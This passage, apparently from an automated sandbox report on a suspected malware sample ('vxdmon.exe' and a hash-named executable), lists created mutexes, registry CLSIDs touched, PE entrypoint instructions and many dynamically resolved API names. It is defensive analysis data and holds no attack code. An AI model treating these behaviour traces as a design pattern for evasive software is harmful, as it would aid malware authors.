\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Aeb-75\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vxdmon.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"VXDMON.EXE.67A9C45E.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"\n \"vxdmon.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"\n \"VXDMON.EXE.67A9C45E.bin\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x41a3e8,push\t0x411908,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x58,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,call\tdword ptr [0x41a190],xor\tedx, edx,mov\tdl, ah,mov\tdword ptr [0x42f11c], edx,mov\tecx, eax,and\tecx, 0xff,mov\tdword ptr [0x42f118], ecx,shl\tecx, 8,add\tecx, edx,mov\tdword ptr [0x42f114], ecx,shr\teax, 0x10,mov\tdword ptr [0x42f110], eax,xor\tesi, esi,push\tesi,call\t0x4142fa,pop\tecx,test\teax, eax,jne\t0x412013,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegisterServiceProcess (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedState (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedStateEx (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegisterServiceProcess (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedState (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedStateEx (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006048)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00006048)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00006048)\n \"vxdmon.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00006048)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004016)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004016)\n 